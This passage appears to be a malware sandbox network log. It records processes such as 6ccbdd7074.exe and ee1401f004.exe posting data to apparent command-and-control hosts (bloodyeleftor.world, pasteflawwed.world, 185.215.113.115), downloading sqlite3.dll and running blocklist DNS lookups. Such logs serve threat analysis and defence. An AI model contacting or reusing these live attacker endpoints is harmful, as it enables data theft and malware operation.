                                                                                              Content-Type: multipart/form-data; boundary=MZ4OB14E0VQ05
                                                                                              Cookie: __cf_mw_byp=lq2YwPMmrfMe6Y8F_MYyCFgkxlqWDhwa5qqWv0i1Cr0-1740011631-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1072
                                                                                              Host: bloodyeleftor.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:52 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=i6g5ce9opd3i3l0ef648ha795b; expires=Fri, 21 Feb 2025 00:33:52 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r1if0%2F7ohdlWg1KMDSDBkWS23bgmmVJuGDNqlrrqwoQvnRPOuexCxZ0qIAu%2FgMbyk1KAUzlsxCj6FOjZboj5EJAkOPQ%2FDh8V9GSC9MwI8CG%2B5Ofrhz8e6iWBmfgkZet8BpatQ%2F3w"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a685dbc7577a1-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42068&min_rtt=41776&rtt_var=9273&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3307&recv_bytes=1777&delivery_rate=93715&cwnd=253&unsent_bytes=0&cid=9994056eb953efd1&ts=292&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://bloodyeleftor.world/api
                                                                                              198cfc7201.exe
                                                                                              Remote address:
                                                                                              104.21.63.231:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=lq2YwPMmrfMe6Y8F_MYyCFgkxlqWDhwa5qqWv0i1Cr0-1740011631-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 77
                                                                                              Host: bloodyeleftor.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:52 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=avvmf1gkqp8g01uls65fhqocbb; expires=Fri, 21 Feb 2025 00:33:52 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tzDDo7G4F6TOfkAdKh3WMFNowSKcxTKYVJVW4M7VR75iCjIuL6PPAU6z27BXr4eIYh1J93iHJ4OyGatYjBErs2xSi6KXYJSGQBcmDxccsqo955%2BwIKrnWejkKS7t7Fu9sy0dLyas"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a68601c560876-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42419&min_rtt=42211&rtt_var=9283&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3306&recv_bytes=770&delivery_rate=92866&cwnd=253&unsent_bytes=0&cid=bcec1dbf4bdd7437&ts=285&x=0"
                                                                                            • flag-us
                                                                                              DNS
                                                                                              147.63.102.212.dnsbl.sorbs.net
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              147.63.102.212.dnsbl.sorbs.net
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              147.63.102.212.bl.spamcop.net
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              147.63.102.212.bl.spamcop.net
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              147.63.102.212.zen.spamhaus.org
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              147.63.102.212.zen.spamhaus.org
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              147.63.102.212.sbl-xbl.spamhaus.org
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              147.63.102.212.sbl-xbl.spamhaus.org
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              147.63.102.212.cbl.abuseat.org
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              147.63.102.212.cbl.abuseat.org
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              impactsupport.world
                                                                                              6ccbdd7074.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              impactsupport.world
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://pasteflawwed.world/api
                                                                                              6ccbdd7074.exe
                                                                                              Remote address:
                                                                                              104.21.86.17:443
                                                                                              Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: pasteflawwed.world
  Response
    HTTP/1.1 403 Forbidden
    Date: Thu, 20 Feb 2025 00:33:58 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Frame-Options: SAMEORIGIN
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pXFMfq1ZW78EHQ7lVHw8Y7DiLU69xw8giclcgr0KAB%2BbMYWxzFAIsKMYSvp53wXF1HwhmHv4rwi%2B0%2BZz5tph%2FVeJ9dg1yidafXNPitnQumNLnPYA5LpWcvcL9y2exrBLepVE6Nw%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 914a68879ce2ef49-LHR

• flag-us
  POST https://pasteflawwed.world/api
  Process: 6ccbdd7074.exe
  Remote address: 104.21.86.17:443
  Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Cookie: __cf_mw_byp=pp2_O5dTvYIbReh6x0e5EeSUw_PKJt0cgA3CGsUEJjY-1740011638-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 48
    Host: pasteflawwed.world
  Response
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:33:59 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Set-Cookie: PHPSESSID=907t8ia7pnr21dpsa2d0gqtrog; expires=Fri, 21 Feb 2025 00:33:59 GMT; Max-Age=86400; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MbUnlNzXQXeRuiyexXytjSo8%2Blv9%2FztoLOzGVNH8TwdRIeZ9I8rE%2FIAELdblMv4tKjFFhe7u8Ant4MEkkoHtgnPQ0fgCM9F09xliT2ak6Ic%2FwM8TmouLoWsx%2BmOv1ZN4ImHIdF4%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 914a6889af85ef49-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=48276&min_rtt=44291&rtt_var=8506&sent=15&recv=12&lost=0&retrans=1&sent_bytes=8606&recv_bytes=1070&delivery_rate=155177&cwnd=257&unsent_bytes=0&cid=d3207fc2c2569cba&ts=657&x=0"

• flag-us
  POST https://pasteflawwed.world/api
  Process: 6ccbdd7074.exe
  Remote address: 104.21.86.17:443
  Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=FQE00QT5KR0N
    Cookie: __cf_mw_byp=pp2_O5dTvYIbReh6x0e5EeSUw_PKJt0cgA3CGsUEJjY-1740011638-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1596
    Host: pasteflawwed.world
  Response
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:33:59 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Set-Cookie: PHPSESSID=cr5h6ce3051099226n3lpvoea6; expires=Fri, 21 Feb 2025 00:33:59 GMT; Max-Age=86400; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WVWUWspoR1QprFe%2FJVXu97AJzUcKfKnRKZhntVTpJEaPscj7p5%2Fvc%2F4vqxPlsZBAkPedALzVXlaBTRX%2FjNJJBHrhD6l3ipaFFDOwAZGNLlfVYFuOrz%2BBX0QkJ7f%2F5gyOSeRB768%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 914a688bb9e6ef49-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=48602&min_rtt=44291&rtt_var=7032&sent=20&recv=16&lost=0&retrans=1&sent_bytes=9783&recv_bytes=3090&delivery_rate=155177&cwnd=257&unsent_bytes=0&cid=d3207fc2c2569cba&ts=899&x=0"

• flag-us
  POST https://pasteflawwed.world/api
  Process: 6ccbdd7074.exe
  Remote address: 104.21.86.17:443
  Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=CO9CS5DIJQ
    Cookie: __cf_mw_byp=pp2_O5dTvYIbReh6x0e5EeSUw_PKJt0cgA3CGsUEJjY-1740011638-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1066
    Host: pasteflawwed.world
  Response
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:34:00 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Set-Cookie: PHPSESSID=q29c3rb3kubt9vlcje9bbqbhfb; expires=Fri, 21 Feb 2025 00:34:00 GMT; Max-Age=86400; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mdDSw%2FPoEs22NHEMFA9yJbU8mXnT3o60JroCGI5Rofrrz8y7SXyl56683W5frsCyqW%2FGaQ9Zqq249SIVFXVIsceyKuRQHNoQQo9oszQvzkqWsYjYiEVx%2BSLLxJr9pBNNZ3jTYOk%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 914a688def9386d0-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=42079&min_rtt=41908&rtt_var=9120&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3301&recv_bytes=1766&delivery_rate=95292&cwnd=253&unsent_bytes=0&cid=c82ecceffda75930&ts=237&x=0"

• flag-us
  POST https://pasteflawwed.world/api
  Process: 6ccbdd7074.exe
  Remote address: 104.21.86.17:443
  Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Cookie: __cf_mw_byp=pp2_O5dTvYIbReh6x0e5EeSUw_PKJt0cgA3CGsUEJjY-1740011638-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 82
    Host: pasteflawwed.world
  Response
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:34:00 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Set-Cookie: PHPSESSID=mutmv66d8p1gr6vh14ts1tjmjh; expires=Fri, 21 Feb 2025 00:34:00 GMT; Max-Age=86400; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vqcpyWH5nj7lIoBV3HdgHkaqbJEu4HyHYqUNQ41Z4OZDOWgp7K%2BwwShSWDkfYMnSxpMQz44CD1vQl%2Bw1cNgqOo7OQecfnY15I68RbpxIDvEETBsVvyGf50IvttwfkuFz6D4n8aw%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 914a688feac888cb-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=42009&min_rtt=41808&rtt_var=9151&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3300&recv_bytes=773&delivery_rate=95150&cwnd=253&unsent_bytes=0&cid=d46a35546e43b876&ts=293&x=0"

• flag-ru
  GET http://185.215.113.115/
  Process: ee1401f004.exe
  Remote address: 185.215.113.115:80
  Request
    GET / HTTP/1.1
    Host: 185.215.113.115
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:34:02 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 0
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8

• flag-ru
  POST http://185.215.113.115/c4becf79229cb002.php
  Process: ee1401f004.exe
  Remote address: 185.215.113.115:80
  Request
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----GCBKFBFCGIEHIDGCFBFB
    Host: 185.215.113.115
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:34:02 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Vary: Accept-Encoding
    Content-Length: 180
    Keep-Alive: timeout=5, max=99
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8

• flag-ru
  POST http://185.215.113.115/c4becf79229cb002.php
  Process: ee1401f004.exe
  Remote address: 185.215.113.115:80
  Request
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----EGCFIDAFBFBAKFHJEGIJ
    Host: 185.215.113.115
    Content-Length: 268
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:34:02 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Vary: Accept-Encoding
    Content-Length: 2028
    Keep-Alive: timeout=5, max=98
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8

• flag-ru
  POST http://185.215.113.115/c4becf79229cb002.php
  Process: ee1401f004.exe
  Remote address: 185.215.113.115:80
  Request
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IECBGIDAEHCGDGCBKEBG
    Host: 185.215.113.115
    Content-Length: 267
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:34:02 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Vary: Accept-Encoding
    Content-Length: 7116
    Keep-Alive: timeout=5, max=97
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8

• flag-ru
  POST http://185.215.113.115/c4becf79229cb002.php
  Process: ee1401f004.exe
  Remote address: 185.215.113.115:80
  Request
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----FHIECBAFBFHIJKFIJDAK
    Host: 185.215.113.115
    Content-Length: 268
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:34:02 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Vary: Accept-Encoding
    Content-Length: 108
    Keep-Alive: timeout=5, max=96
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8

• flag-ru
  POST http://185.215.113.115/c4becf79229cb002.php
  Process: ee1401f004.exe
  Remote address: 185.215.113.115:80
  Request
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AFHDBGHJKFIDHJJJEBKE
    Host: 185.215.113.115
    Content-Length: 4871
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:34:02 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 0
    Keep-Alive: timeout=5, max=95
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8

• flag-ru
  GET http://185.215.113.115/68b591d6548ec281/sqlite3.dll
  Process: ee1401f004.exe
  Remote address: 185.215.113.115:80
                                                                                              Request
                                                                                              GET /68b591d6548ec281/sqlite3.dll HTTP/1.1
                                                                                              Host: 185.215.113.115
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:03 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                                                              ETag: "10e436-5e7ec6832a180"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 1106998
                                                                                              Content-Type: application/x-msdos-program
                                                                                            • flag-gb
                                                                                              GET
                                                                                              http://www.google.com/
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:80
                                                                                              Request
                                                                                              GET / HTTP/1.1
                                                                                              Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                              Accept-Language: en
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                              Host: www.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:03 GMT
                                                                                              Expires: -1
                                                                                              Cache-Control: private, max-age=0
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-vlkUnzNS8orPiWJMcWff7A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                              Content-Encoding: gzip
                                                                                              Server: gws
                                                                                              Content-Length: 1884
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Set-Cookie: AEC=AVcja2dtSHazVHyaoG5yx_Sz4f0pEeHr-kMqThBfGjAXGjFc2SvaitnVNDw; expires=Tue, 19-Aug-2025 00:34:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                            • flag-gb
                                                                                              GET
                                                                                              http://www.google.com/
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:80
                                                                                              Request
                                                                                              GET / HTTP/1.1
                                                                                              Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                              Accept-Language: en
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                              Host: www.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:03 GMT
                                                                                              Expires: -1
                                                                                              Cache-Control: private, max-age=0
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-aWwRdoxknYv34jcywl7xbQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                              Content-Encoding: gzip
                                                                                              Server: gws
                                                                                              Content-Length: 1884
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Set-Cookie: AEC=AVcja2eIqMLXcoOSxJniONaebvKYndpUPcodMoDBs1Sou8Ln2J_NsmrFLKQ; expires=Tue, 19-Aug-2025 00:34:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                            • flag-gb
                                                                                              GET
                                                                                              http://www.google.com/
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:80
                                                                                              Request
                                                                                              GET / HTTP/1.1
                                                                                              Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                              Accept-Language: en
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                              Host: www.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:03 GMT
                                                                                              Expires: -1
                                                                                              Cache-Control: private, max-age=0
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-kfFvhOhtTb2Scl05K5zemw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                              Content-Encoding: gzip
                                                                                              Server: gws
                                                                                              Content-Length: 1884
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Set-Cookie: AEC=AVcja2c_ywcnvLVk_Y4el39r0FHeuW6VR_C2fUc2eqGhL93ehjrFAAQN1Lg; expires=Tue, 19-Aug-2025 00:34:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                            • flag-gb
                                                                                              GET
                                                                                              http://www.google.com/
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:80
                                                                                              Request
                                                                                              GET / HTTP/1.1
                                                                                              Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                              Accept-Language: en
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                              Host: www.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:03 GMT
                                                                                              Expires: -1
                                                                                              Cache-Control: private, max-age=0
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-8bcnmaMB4QYtfT4DLgZiqw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                              Content-Encoding: gzip
                                                                                              Server: gws
                                                                                              Content-Length: 1884
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Set-Cookie: AEC=AVcja2fLh1qkYA2pchw5drjiv8V6awcJPAa-P1OXhpBoPX8Qdu6Ybz1g2A; expires=Tue, 19-Aug-2025 00:34:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                            • flag-gb
                                                                                              GET
                                                                                              http://www.google.com/
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:80
                                                                                              Request
                                                                                              GET / HTTP/1.1
                                                                                              Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                              Accept-Language: en
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                              Host: www.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:03 GMT
                                                                                              Expires: -1
                                                                                              Cache-Control: private, max-age=0
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-FsMBO--y7dhkk-y13HgyBw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                              Content-Encoding: gzip
                                                                                              Server: gws
                                                                                              Content-Length: 1884
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Set-Cookie: AEC=AVcja2fRyub5vPfq8Ina0t88PUZj3Jt81-Xf8HKp7iKWZCbKskQO32bqwQ; expires=Tue, 19-Aug-2025 00:34:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                            • flag-gb
                                                                                              GET
                                                                                              http://www.google.com/
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:80
                                                                                              Request
                                                                                              GET / HTTP/1.1
                                                                                              Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                              Accept-Language: en
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                              Host: www.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:03 GMT
                                                                                              Expires: -1
                                                                                              Cache-Control: private, max-age=0
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-13RL75uP7kUaG9NM4dVHVA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                              Content-Encoding: gzip
                                                                                              Server: gws
                                                                                              Content-Length: 1884
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Set-Cookie: AEC=AVcja2dA4nZcFqqQa9VHEt-lHx3q6y8_LmslgXHo3DKT00mUk0GOGVQqVrc; expires=Tue, 19-Aug-2025 00:34:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                            • flag-gb
                                                                                              GET
                                                                                              http://www.google.com/
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:80
                                                                                              Request
                                                                                              GET / HTTP/1.1
                                                                                              Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                              Accept-Language: en
                                                                                              Accept-Encoding: gzip, deflate
